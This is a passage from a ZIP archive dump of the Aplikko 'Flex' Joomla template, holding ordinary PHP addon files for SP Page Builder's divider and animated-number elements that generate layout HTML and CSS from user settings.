					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_VERTICAL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_VERTICAL_DESC'),
					'std' => 0,
					'depends' => array('divider_type' => 'border'),
				),

				'divider_height_vertical'=>array(
					'type' => 'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_HEIGHT'),
					'depends' => array('divider_vertical' => 1),
					'max'=>2500,
					'responsive'=> true,
					'std'=>array('md'=>'100', 'sm'=>'', 'xs'=>''),
				),

				'divider_image'=>array(
					'type' => 'media',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_IMAGE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_IMAGE_DESC'),
					'std' => '',
					'depends' => array('divider_type' => 'image'),
				),

				'background_repeat'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_BG_REPEAT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_BG_REPEAT_DESC'),
					'values'=>array(
						'no-repeat'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_NO_REPEAT'),
						'repeat'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_REPEAT_ALL'),
						'repeat-x'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_REPEAT_HORIZONTALLY'),
						'repeat-y'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BACKGROUND_REPEAT_VERTICALLY'),
						'inherit'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_INHERIT'),
					),
					'std'=>'no-repeat',
					'depends' => array('divider_type' => 'image'),
				),

				'divider_height'=>array(
					'type' => 'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_HEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_HEIGHT_DESC'),
					'std' => '10',
					'placeholder' => '10',
					'depends' => array('divider_type' => 'image'),
				),

				'divider_position'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_POSITION'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_POSITION_DESC'),
					'values'=>array(
						'left'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LEFT'),
						'center'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_CENTER'),
						'right'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_RIGHT'),
					),
					'responsive'=> true,
					'std'=>'',
				),

				'container_div_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_CONTAINER_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_CONTAINER_WIDTH_DESC'),
					'depends' => array(
						array('divider_vertical', '!=', 1),
					),
					'max'=>2000,
					'responsive'=> true,
					'std'=>array('md'=>'', 'sm'=>'', 'xs'=>''),
				),

				'border_style'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_BORDER_STYLE_DESC'),
					'values'=>array(
						'solid'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE_SOLID'),
						'dashed'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE_DASHED'),
						'dotted'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_STYLE_DOTTED'),
					),
					'std'=>'solid',
					'depends' => array('divider_type' => 'border'),
				),

				'border_width'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_WIDTH'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_BORDER_WIDTH_DESC'),
					'std'=>'1',
					'depends' => array('divider_type' => 'border'),
				),

				'border_radius'=>array(
					'type'=>'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_BORDER_RADIUS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_BORDER_RADIUS_DESC'),
					'max'=> 1000,
					'std'=>'',
					'depends' => array('divider_type' => 'border'),
				),

				'border_color'=>array(
					'type' => 'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_BORDER_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_BORDER_COLOR_DESC'),
					'std' => '#cccccc',
					'depends' => array('divider_type' => 'border'),
				),

				'margin_top'=>array(
					'type' => 'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_MARGIN_TOP_DESC'),
					'std' => array('md'=>30, 'sm'=>20, 'xs'=>10),
					'responsive' => true
				),

				'margin_bottom'=>array(
					'type' => 'slider',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_DIVIDER_MARGIN_BOTTOM_DESC'),
					'std' => array('md'=>30, 'sm'=>20, 'xs'=>10),
					'responsive' => true
				),

				'class'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
					'std'=> ''
				),
			),
		)
	)
);
PK!n�չ22*flex/sppagebuilder/addons/divider/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('Restricted access');

class SppagebuilderAddonDivider extends SppagebuilderAddons {

	public function render() {
		$settings = $this->addon->settings;
		$class = (isset($settings ->class) && $settings ->class) ? $settings ->class : '';
		$divider_type = (isset($settings ->divider_type) && $settings ->divider_type) ? $settings ->divider_type : '';
		$divider_position = (isset($settings ->divider_position) && $settings ->divider_position) ? 'divider-position' : '';
		//output start
		$output = '';
		$output .='<div class="sppb-addon-divider-wrap '.$divider_position.'">';
		$output .='<div class="sppb-divider sppb-divider-' . $divider_type . ' ' . $class . '"></div>';
		$output .='</div>';
		return $output;
	}

	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$settings = $this->addon->settings;

		$divider_type		= (isset($settings->divider_type) && $settings->divider_type) ? $settings->divider_type : '';
		$margin_top 	 	= (isset($settings->margin_top) && gettype($settings->margin_top)=='string') ? $settings->margin_top : 1;
		$margin_top_sm 	 	= (isset($settings->margin_top_sm) && gettype($settings->margin_top_sm)=='string') ? $settings->margin_top_sm : 1;
		$margin_top_xs 	 	= (isset($settings->margin_top_xs) && gettype($settings->margin_top_xs)=='string') ? $settings->margin_top_xs : 1;
		$margin_bottom 	 	= (isset($settings->margin_bottom) && gettype($settings->margin_bottom)=='string') ? $settings->margin_bottom : 1;
		$margin_bottom_sm 	 	= (isset($settings->margin_bottom_sm) && gettype($settings->margin_bottom_sm)=='string') ? $settings->margin_bottom_sm : 1;
		$margin_bottom_xs 	 	= (isset($settings->margin_bottom_xs) && gettype($settings->margin_bottom_xs)=='string') ? $settings->margin_bottom_xs : 1;
		$border_color 	 	= (isset($settings->border_color) && $settings->border_color) ? $settings->border_color : '';
		$border_style 	 	= (isset($settings->border_style) && $settings->border_style) ? $settings->border_style : 'solid';
		$border_width 	 	= (isset($settings->border_width) && $settings->border_width) ? $settings->border_width : 1;
		$divider_height 	= (isset($settings->divider_height) && $settings->divider_height) ? $settings->divider_height : 10;
		$divider_image 		= (isset($settings->divider_image) && $settings->divider_image) ? $settings->divider_image : '';
		$background_repeat 	= (isset($settings->background_repeat) && $settings->background_repeat) ? $settings->background_repeat : 'no-repeat';
		$border_radius 	= (isset($settings->border_radius) && $settings->border_radius) ? $settings->border_radius : '';
		$divider_vertical 	= (isset($settings->divider_vertical) && $settings->divider_vertical) ? $settings->divider_vertical : '';

		$container_div_width = (isset($settings->container_div_width) && $settings->container_div_width) ? $settings->container_div_width : '';
		$container_div_width_sm = (isset($settings->container_div_width_sm) && $settings->container_div_width_sm) ? $settings->container_div_width_sm : '';
		$container_div_width_xs = (isset($settings->container_div_width_xs) && $settings->container_div_width_xs) ? $settings->container_div_width_xs : '';
		//Divider height in vertical mod
		$divider_height_vertical = (isset($settings->divider_height_vertical) && $settings->divider_height_vertical) ? $settings->divider_height_vertical : '';
		$divider_height_vertical_sm = (isset($settings->divider_height_vertical_sm) && $settings->divider_height_vertical_sm) ? $settings->divider_height_vertical_sm : '';
		$divider_height_vertical_xs = (isset($settings->divider_height_vertical_xs) && $settings->divider_height_vertical_xs) ? $settings->divider_height_vertical_xs : '';

		$css = '';

		$style = '';
		$style_sm = '';
		$style_xs = '';

		$style .= ($margin_top != '') ? 'margin-top:' . (int) $margin_top  . 'px;' : '';
		$style_sm .= ($margin_top_sm != '') ? 'margin-top:' . (int) $margin_top_sm  . 'px;' : '';
		$style_xs .= ($margin_top_xs != '') ? 'margin-top:' . (int) $margin_top_xs  . 'px;' : '';
		$style .= ($margin_bottom != '') ? 'margin-bottom:' . (int) $margin_bottom  . 'px;' : '';
		$style_sm .= ($margin_bottom_sm != '') ? 'margin-bottom:' . (int) $margin_bottom_sm  . 'px;' : '';
		$style_xs .= ($margin_bottom_xs != '') ? 'margin-bottom:' . (int) $margin_bottom_xs  . 'px;' : '';
		$style .= ($container_div_width != '') ? 'width:' . (int) $container_div_width  . 'px;' : '';
		$style_sm .= ($container_div_width_sm != '') ? 'width:' . (int) $container_div_width_sm  . 'px;' : '';
		$style_xs .= ($container_div_width_xs != '') ? 'width:' . (int) $container_div_width_xs  . 'px;' : '';

		$inner_style = '';
		if($divider_type == 'border') {
			if(!$divider_vertical){
				$inner_style .= $border_width ? 'border-bottom-width:' . (int) $border_width  . 'px;' : '';
				$inner_style .= ($border_style) ? 'border-bottom-style:' . $border_style  . ';' : '';
				$inner_style .= ($border_color) ? 'border-bottom-color:' . $border_color  . ';' : '';
				$inner_style .= ($border_radius) ? 'border-radius:' . $border_radius  . 'px;' : '';
			} else {
				$inner_style .= $divider_height_vertical ? 'height:' . $divider_height_vertical  . 'px;' : '';
				$inner_style .= $border_width ? 'width:' . (int) $border_width  . 'px;' : '';
				$inner_style .= $border_width ? 'border-left-width:' . (int) $border_width  . 'px;' : '';
				$inner_style .= ($border_style) ? 'border-left-style:' . $border_style  . ';' : '';
				$inner_style .= ($border_color) ? 'border-left-color:' . $border_color  . ';' : '';
				$inner_style .= ($border_radius) ? 'border-radius:' . $border_radius  . 'px;' : '';
			}
		} else {
			$inner_style .= ($divider_height) ? 'height:' . (int) $divider_height  . 'px;' : '';
			$inner_style .= ($divider_image) ? 'background-image: url(' . JURI::base() . '/' . $divider_image  . ');background-repeat:' . $background_repeat . ';background-position:50% 50%;' : '';
		}

		if($style) {
			$css .= $addon_id . ' .sppb-divider {';
			$css .= $style;
			$css .= $inner_style;
			$css .= '}';
		}
		
		if(isset($settings->divider_position) && $settings->divider_position && $container_div_width != ''){
			$css .= '#sppb-addon-' . $this->addon->id . ' .divider-position {';
				if($settings->divider_position == 'left'){
					$css .= 'float:left;';
				} elseif( $settings->divider_position == 'right' ){
					$css .= 'float:right;';
				} elseif( $settings->divider_position == 'center' ){
					$css .= 'float:none;margin-left:auto;margin-right:auto;display:table;';
				}
			$css .= '}';
		}

		$css .= '@media (min-width: 768px) and (max-width: 991px) {';
			if($style_sm) {
				$css .= $addon_id . ' .sppb-divider {';
					$css .= $style_sm;
					if($divider_vertical && $divider_height_vertical_sm){
						$css .= $divider_height_vertical_sm ? 'height:' . (int) $divider_height_vertical_sm  . 'px;' : '';
					}
				$css .= '}';
			}
			if(isset($settings->divider_position_sm) && $settings->divider_position_sm){
				$css .= '#sppb-addon-' . $this->addon->id . ' .divider-position {';
					if($settings->divider_position_sm == 'left'){
						$css .= 'float:left;';
					} elseif( $settings->divider_position_sm == 'right' ){
						$css .= 'float:right;';
					} elseif( $settings->divider_position_sm == 'center' ){
						$css .= 'float:none;margin-left:auto;margin-right:auto;display:table;';
					}
				$css .= '}';
			}
		$css .= '}';
		
		$css .= '@media (max-width: 767px) {';
			if($style_xs) {
				$css .= $addon_id . ' .sppb-divider {';
					$css .= $style_xs;
					if($divider_vertical && $divider_height_vertical_xs){
						$css .= $divider_height_vertical_xs ? 'height:' . $divider_height_vertical_xs  . 'px;' : '';
					}
				$css .= '}';
			}
			if(isset($settings->divider_position_xs) && $settings->divider_position_xs){
				$css .= '#sppb-addon-' . $this->addon->id . ' .divider-position {';
					if($settings->divider_position_xs == 'left'){
						$css .= 'float:left;';
					} elseif( $settings->divider_position_xs == 'right' ){
						$css .= 'float:right;';
					} elseif( $settings->divider_position_xs == 'center' ){
						$css .= 'float:none;margin-left:auto;margin-right:auto;display:table;';
					}
				$css .= '}';
			}
		$css .= '}';

		return $css;
	}

	public static function getTemplate(){
		$output = '
		<style type="text/css">
			#sppb-addon-{{ data.id }} .sppb-divider {
				<# if(_.isObject(data.margin_top)){ #>
					margin-top: {{ data.margin_top.md }}px;
				<# } else { #>
					margin-top: {{ data.margin_top }}px;
				<# } #>

				<# if(_.isObject(data.margin_bottom)){ #>
					margin-bottom: {{ data.margin_bottom.md }}px;
				<# } else { #>
					margin-bottom: {{ data.margin_bottom }}px;
				<# } #>
				<# if(_.isObject(data.container_div_width)){ #>
					width: {{ data.container_div_width.md }}px;
				<# } else { #>
					width: {{ data.container_div_width }}px;
				<# } #>

				<#
				if(data.divider_type == "border"){ 
					if(!data.divider_vertical){
				#>
					border-bottom-width: {{ data.border_width }}px;
					border-bottom-style: {{ data.border_style }};
					border-bottom-color: {{ data.border_color }};
					border-radius: {{ data.border_radius }}px;
				<# } else {
					if(_.isObject(data.divider_height_vertical)){
				#>
					height:{{data.divider_height_vertical.md}}px;
				<# } #>
					width:{{data.border_width}}px;
					border-left-width: {{ data.border_width }}px;
					border-left-style: {{ data.border_style }};
					border-left-color: {{ data.border_color }};
					border-radius:{{data.border_radius}}px;
				<# }
				} else { 
				#>
					height: {{ data.divider_height }}px;
					background-image: url({{ pagebuilder_base + data.divider_image }});
					background-repeat: {{ data.background_repeat }};
				<# } #>
			}

			<# if(_.isObject(data.divider_position) && data.divider_position.md){ #>
				#sppb-addon-{{ data.id }} .divider-position {
					<# if(data.divider_position.md == "left"){ #>
						float:left;
					<# } else if(data.divider_position.md == "right" ){ #>
						float:right;
					<# } else if(data.divider_position.md == "center" ){ #>
						float:none;margin-left:auto;margin-right:auto;display:table;
					<# } #>
				}
			<# } #>

			@media (min-width: 768px) and (max-width: 991px) {
				#sppb-addon-{{ data.id }} .sppb-divider {
					<# if(_.isObject(data.margin_top)){ #>
						margin-top: {{ data.margin_top.sm }}px;
					<# } #>

					<# if(_.isObject(data.margin_bottom)){ #>
						margin-bottom: {{ data.margin_bottom.sm }}px;
					<# } #>
					<# if(_.isObject(data.container_div_width)){ #>
						width: {{ data.container_div_width.sm }}px;
					<# }
					if(data.divider_vertical && _.isObject(data.divider_height_vertical)){
					#>
						height:{{data.divider_height_vertical.sm}}px;
					<# } #>
				}
				<# if(_.isObject(data.divider_position) && data.divider_position.sm){ #>
					#sppb-addon-{{ data.id }} .divider-position {
						<# if(data.divider_position.sm == "left"){ #>
							float:left;
						<# } else if(data.divider_position.sm == "right" ){ #>
							float:right;
						<# } else if(data.divider_position.sm == "center" ){ #>
							float:none;margin-left:auto;margin-right:auto;display:table;
						<# } #>
					}
				<# } #>
			}
			@media (max-width: 767px) {
				#sppb-addon-{{ data.id }} .sppb-divider {
					<# if(_.isObject(data.margin_top)){ #>
						margin-top: {{ data.margin_top.xs }}px;
					<# } #>

					<# if(_.isObject(data.margin_bottom)){ #>
						margin-bottom: {{ data.margin_bottom.xs }}px;
					<# } #>
					<# if(_.isObject(data.container_div_width)){ #>
						width: {{ data.container_div_width.xs }}px;
					<# }
					if(data.divider_vertical && _.isObject(data.divider_height_vertical)){
					#>
						height:{{data.divider_height_vertical.xs}}px;
					<# } #>
				}
				<# if(_.isObject(data.divider_position) && data.divider_position.xs){ #>
					#sppb-addon-{{ data.id }} .divider-position {
						<# if(data.divider_position.xs == "left"){ #>
							float:left;
						<# } else if(data.divider_position.xs == "right" ){ #>
							float:right;
						<# } else if(data.divider_position.xs == "center" ){ #>
							float:none;margin-left:auto;margin-right:auto;display:table;
						<# } #>
					}
				<# } #>
			}
		</style>
		<#
		let dividerPosition = (!_.isEmpty(data.divider_type) && data.divider_type) ? "divider-position" : "";
		#>
		<div class="sppb-addon-divider-wrap {{dividerPosition}}">
			<div class="sppb-divider sppb-divider-{{ data.divider_type }} {{ data.class }}"></div>
		</div>
		';

		return $output;
	}

}
PK!R�e�0�02flex/sppagebuilder/addons/animated_number/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

class SppagebuilderAddonAnimated_number extends SppagebuilderAddons{

	public function render() {

		$settings = $this->addon->settings;
		$number = (isset($settings->number) && $settings->number) ? $settings->number : 0;
		$number_addtext = (isset($settings->number_addtext) && $settings->number_addtext) ? $settings->number_addtext : '';
		$duration = (isset($settings->duration) && $settings->duration) ? $settings->duration : 0;
		
		$counter_title = (isset($settings->counter_title) && $settings->counter_title) ? $settings->counter_title : '';
		$alignment = (isset($settings->alignment) && $settings->alignment) ? $settings->alignment : '';
		
		$font_size = (isset($settings->font_size) && $settings->font_size) ? $settings->font_size : '';
		$color = (isset($settings->color) && $settings->color) ? $settings->color : '';
		$title_font_size = (isset($settings->title_font_size) && $settings->title_font_size) ? $settings->title_font_size : '';
		$counter_color = (isset($settings->counter_color) && $settings->counter_color) ? $settings->counter_color : '';
		$background = (isset($settings->background) && $settings->background) ? $settings->background : '';
		$border_color = (isset($settings->border_color) && $settings->border_color) ? $settings->border_color : '';
		$border_width = (isset($settings->border_width) && $settings->border_width) ? $settings->border_width : '';
		$border_radius = (isset($settings->border_radius) && $settings->border_radius) ? $settings->border_radius : '';
		
		$class = (isset($settings->class) && $settings->class) ? $settings->class : '';

		// Styling
		$style = '';
		$color = '';
		$number_style = '';
		$text_style 	= '';
	
		if($background) $class .= $class . ' sppb-hasbg';
	
		if($background) $style .= 'background-color:' . $background  . ';';
		if($border_color) $style .= 'border-style:solid;border-color:' . $border_color  . ';';
		
		$border_width != '' ? $padding = 'padding:20px;' : $padding = '';
		$class == 'shadow' ? $shadow = 'box-shadow:0 0 15px rgba(0,0,0,0.2);text-shadow: 1px 2px 2px rgba(0,0,0,0.2);padding:20px;' : $shadow = '';
		$class == 'padding' ? $paddingbox = 'padding:20px;' : $paddingbox = '';
		
		if($border_width) $style .= 'border-width:' . (int) $border_width  . 'px;';
		if($border_radius) $style .= 'border-radius:' . (int) $border_radius  . 'px;';
		
		$number_addtext != '' ? $number_addtext = '<span class="number_addtext">'. $number_addtext .'</span>' : $number_addtext = '';

		$output  = '<div class="sppb-addon sppb-addon-animated-number '. $alignment . ' ' . $class .'">';
		
		$output .= '<div class="sppb-addon-content" style="' . $paddingbox . $padding . $style . $shadow . '">';
		$output .= '<span class="sppb-animated-number" data-digit="'. $number .'" data-duration="' . $duration . '">0</span>'. $number_addtext .'';
		if($counter_title) $output .= '<div class="sppb-animated-number-title">' . $counter_title . '</div>';
		$output .= '</div>';
	
		$output .= '</div>';
		
		return $output;
	}


	public function css() {
		$addon_id = '#sppb-addon-' . $this->addon->id;
		$settings = $this->addon->settings;
		//Number Style
		$number_style = '';
		$number_style .= (isset($settings->color) && $settings->color) ? 'color:' . $settings->color  . ';' : '';
		$number_style .= (isset($settings->font_size) && $settings->font_size) ? 'font-size:' . (int) $settings->font_size . 'px;' : '';
		$number_style .= (isset($settings->line_height) && $settings->line_height) ? 'line-height:' . (int) $settings->line_height . 'px;' : '';
		$number_style .= (isset($settings->number_font_weight) && $settings->number_font_weight) ? 'font-weight:' . (int) $settings->number_font_weight . ';' : '';
		//Number Tablet Style
		$number_style_sm  = '';
		$number_style_sm .= (isset($settings->font_size_sm) && $settings->font_size_sm) ? 'font-size:' . (int) $settings->font_size_sm . 'px;' : '';
		$number_style_sm .= (isset($settings->line_height_sm) && $settings->line_height_sm) ? 'line-height:' . (int) $settings->line_height_sm . 'px;' : '';
		//Number Mobile Style
		$number_style_xs  = '';
		$number_style_xs .= (isset($settings->font_size_xs) && $settings->font_size_xs) ? 'font-size:' . (int) $settings->font_size_xs . 'px;' : '';
		$number_style_xs .= (isset($settings->line_height) && $settings->line_height) ? 'line-height:' . (int) $settings->line_height . 'px;' : '';
		$number_addtext = (isset($settings->number_addtext) && $settings->number_addtext) ? $settings->number_addtext : '';	
		
		//Text Style
		$text_style = '';
		$text_style_sm = '';
		$text_style_xs = '';

		$text_style .= (isset($settings->title_font_size) && $settings->title_font_size) ? 'font-size:' . (int) $settings->title_font_size . 'px;': '';
		$text_style .= (isset($settings->title_line_height) && $settings->title_line_height) ? 'line-height:' . (int) $settings->title_line_height . 'px;': '';
		// $text_style .= (isset($settings->title_color) && $settings->title_color) ? 'color:' . $settings->title_color . ';': '';
		$text_style .= (isset($settings->counter_color) && $settings->counter_color) ? 'color:' . $settings->counter_color . ';': '';
		$text_style .= (isset($settings->title_margin) && $settings->title_margin) ? 'margin:' . $settings->title_margin . ';': '';
		//Title Font Style
		$title_fontstyle = (isset($settings->title_fontstyle) && $settings->title_fontstyle) ? $settings->title_fontstyle : '';
		if(isset($title_fontstyle->underline) && $title_fontstyle->underline){
			$text_style .= 'text-decoration:underline;';
		}
		if(isset($title_fontstyle->italic) && $title_fontstyle->italic){
			$text_style .= 'font-style:italic;';
		}
		if(isset($title_fontstyle->uppercase) && $title_fontstyle->uppercase){
			$text_style .= 'text-transform:uppercase;';
		}
		if(isset($title_fontstyle->weight) && $title_fontstyle->weight){
			$text_style .= 'font-weight:'.$title_fontstyle->weight.';';
		}
		$text_style_sm = '';
		$text_style_xs = '';

		//Title tablet style
		$text_style_sm .= (isset($settings->title_font_size_sm) && $settings->title_font_size_sm) ? 'font-size:' . (int) $settings->title_font_size_sm . 'px;': '';
		$text_style_sm .= (isset($settings->title_line_height_sm) && $settings->title_line_height_sm) ? 'line-height:' . (int) $settings->title_line_height_sm . 'px;': '';
		$text_style_sm .= (isset($settings->title_margin_sm) && $settings->title_margin_sm) ? 'margin:' . $settings->title_margin_sm . ';' : '';
		//Title mobile style
		$text_style_xs .= (isset($settings->title_font_size_xs) && $settings->title_font_size_xs) ? 'font-size:' . (int) $settings->title_font_size_xs . 'px;': '';
		$text_style_xs .= (isset($settings->title_line_height_xs) && $settings->title_line_height_xs) ? 'line-height:' . (int) $settings->title_line_height_xs . 'px;': '';
		$text_style_xs .= (isset($settings->title_margin_xs) && $settings->title_margin_xs) ? 'margin:' . $settings->title_margin_xs . ';' : '';

		$css = '';

		if($number_style) {
			$css .= $addon_id . ' .sppb-animated-number{';
			$css .= $number_style;
			$css .= '}';
		}

		if($text_style) {
			$css .= $addon_id . ' .sppb-animated-number-title{';
			$css .= $text_style;
			$css .= '}';
		}
	
		if($number_addtext != '') {
			$css .= $addon_id . ' .number_addtext{';
			$css .= $number_style;
			$css .= '}';
		}
	

		$css .= '@media (min-width: 768px) and (max-width: 991px) {';
			if($number_style_sm) {
				$css .= $addon_id . ' .sppb-animated-number {';
					$css .= $number_style_sm;
				$css .= '}';
			}

			if($text_style_sm) {
				$css .= $addon_id . ' .sppb-animated-number-title {';
					$css .= $text_style_sm;
				$css .= '}';
			}
		$css .= '}';

		$css .= '@media (max-width: 767px) {';
			if($number_style_xs) {
				$css .= $addon_id . ' .sppb-animated-number {';
					$css .= $number_style_xs;
				$css .= '}';
			}

			if($text_style_xs) {
				$css .= $addon_id . ' .sppb-animated-number-title {';
					$css .= $text_style_xs;
				$css .= '}';
			}
		$css .= '}';

		return $css;
	}
public static function getTemplate(){
		$output = '
		<#
			var addonId = "sppb-addon-"+data.id;
			var number_position = (!_.isEmpty(data.number_position) && data.number_position) ? "animated-number-position-"+data.number_position : "";
		#>
		<style type="text/css">
			#{{ addonId }} .sppb-animated-number{
				color: {{ data.color }};
				font-weight: {{ data.number_font_weight }};
				font-family: {{ data.number_font_family }};
				<# if(_.isObject(data.font_size)){ #>
					font-size: {{ data.font_size.md }}px;
				<# } else { #>
					font-size: {{ data.font_size }}px;
				<# }
				if(_.isObject(data.line_height)){ #>
					line-height: {{ data.line_height.md }}px;
				<# } else { #>
					line-height: {{ data.line_height }}px;
				<# } #>
			}
			#{{ addonId }} .number_addtext{
				color: {{ data.color }};
				font-weight: {{ data.number_font_weight }};
				font-family: {{ data.number_addtext_font_family }};
				<# if(_.isObject(data.font_size)){ #>
					font-size: {{ data.font_size.md }}px;
				<# } else { #>
					font-size: {{ data.font_size }}px;
				<# }
				if(_.isObject(data.line_height)){ #>
					line-height: {{ data.line_height.md }}px;
				<# } else { #>
					line-height: {{ data.line_height }}px;
				<# } #>
			}
			#{{ addonId }} .sppb-animated-number-title{
				color: {{ data.counter_color }};
				<# if(_.isObject(data.title_font_size)){ #>
					font-size: {{ data.title_font_size.md }}px;
				<# } else { #>
					font-size: {{ data.title_font_size }}px;
				<# }
				if(_.isObject(data.title_line_height)){ #>
					line-height: {{ data.title_line_height.md }}px;
				<# } else { #>
					line-height: {{ data.title_line_height }}px;
				<# }
				if(_.isObject(data.title_margin)){ #>
					margin: {{ data.title_margin.md }};
				<# }
				if(_.isObject(data.title_fontstyle)){ #>
					<# if(data.title_fontstyle.underline){ #>
						text-decoration:underline;
					<# }
					if(data.title_fontstyle.italic){
					#>
						font-style:italic;
					<# }
					if(data.title_fontstyle.uppercase){
					#>
						text-transform:uppercase;
					<# }
					if(data.title_fontstyle.weight){
					#>
						font-weight:{{data.title_fontstyle.weight}};
					<# }
				} #>
			}
			@media (min-width: 768px) and (max-width: 991px) {
				#{{ addonId }} .sppb-animated-number{
					<# if(_.isObject(data.font_size)){ #>
						font-size: {{ data.font_size.sm }}px;
					<# }
					if(_.isObject(data.line_height)){ #>
						line-height: {{ data.line_height.sm }}px;
					<# } #>
				}
				#{{ addonId }} .sppb-animated-number-title{
					<# if(_.isObject(data.title_font_size)){ #>
						font-size: {{ data.title_font_size.sm }}px;
					<# }
					if(_.isObject(data.title_line_height)){ #>
						line-height: {{ data.title_line_height.sm }}px;
					<# }
					if(_.isObject(data.title_margin)){ #>
						margin: {{ data.title_margin.sm }};
					<# } #>
				}
			}
			@media (max-width: 767px) {
				#{{ addonId }} .sppb-animated-number{
					<# if(_.isObject(data.font_size)){ #>
						font-size: {{ data.font_size.xs }}px;
					<# }
					if(_.isObject(data.line_height)){ #>
						line-height: {{ data.line_height.xs }}px;
					<# } #>
				}
				#{{ addonId }} .sppb-animated-number-title{
					<# if(_.isObject(data.title_font_size)){ #>
						font-size: {{ data.title_font_size.xs }}px;
					<# }
					if(_.isObject(data.title_line_height)){ #>
						line-height: {{ data.title_line_height.xs }}px;
					<# }
					if(_.isObject(data.title_margin)){ #>
						margin: {{ data.title_margin.xs }};
					<# } #>
				}
			}
		</style>
		
		<div class="sppb-addon sppb-addon-animated-number {{ data.alignment }} {{ data.class }}">
			<div class="sppb-addon-content">
				<span class="sppb-animated-number sp-inline-editable-element" data-id={{data.id}} data-fieldName="number" contenteditable="true" data-digit="{{ data.number }}" data-duration="{{ data.duration }}">0</span>
				<# if(data.number_addtext){ #>
					<span class="number_addtext">{{ data.number_addtext }}</span>
				<# } #>
				<# if(data.counter_title){ #>
					<div class="sppb-animated-number-title sp-inline-editable-element" data-id={{data.id}} data-fieldName="counter_title" contenteditable="true">{{ data.counter_title }}</div>
				<# } #>
			</div>
		</div>';

		return $output;
	}
}
PK!6,">DD3flex/sppagebuilder/addons/animated_number/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_animated_number',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_DESC'),
		'category'=>'Content',
		'attr'=>array(
			'general' => array(
				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'number'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_NUMBER'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_NUMBER_DESC'),
					'placeholder'=>'1000',
					'std'=>'1000',
				),
				
				'number_addtext'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_ADDTEXT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ANIMATED_NUMBER_ADDTEXT_DESC'),
					'std'=>'',
				),

				'duration'=>array(
					'type'=>'number',
